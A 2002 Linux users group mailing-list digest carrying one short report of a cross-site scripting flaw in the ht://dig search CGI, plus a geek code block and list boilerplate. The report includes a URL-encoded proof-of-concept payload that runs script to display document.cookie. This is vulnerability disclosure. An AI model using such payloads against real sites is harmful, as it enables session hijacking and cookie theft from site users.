[Cross-site scripting vulnerability in ht://dig -- Raju] This is an RFC 1153 digest. (1 message) ----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]> From: Howard Yeend <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: XSS in HTDIG Date: Wed, 26 Jun 2002 01:38:48 -0700 (PDT) Eg; http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E (all URLS must be on one line) Apologies if this is a known issue. Apologies also for posting about XSS, too, but this is not an isolated website, but a commonly used service. ===== -----BEGIN GEEK CODE BLOCK----- Version: 3.1 www.geekcode.com GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D-(Quake+++) G+++ e* h r++>+++ y+(+++) -----END GEEK CODE BLOCK----- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com ------------------------------ End of this Digest ****************** -- Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves ================================================ To subscribe, send email to [EMAIL PROTECTED] with subscribe in subject header To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header Archives are available at http://www.mail-archive.com/ilugd%40wpaa.org =================================================
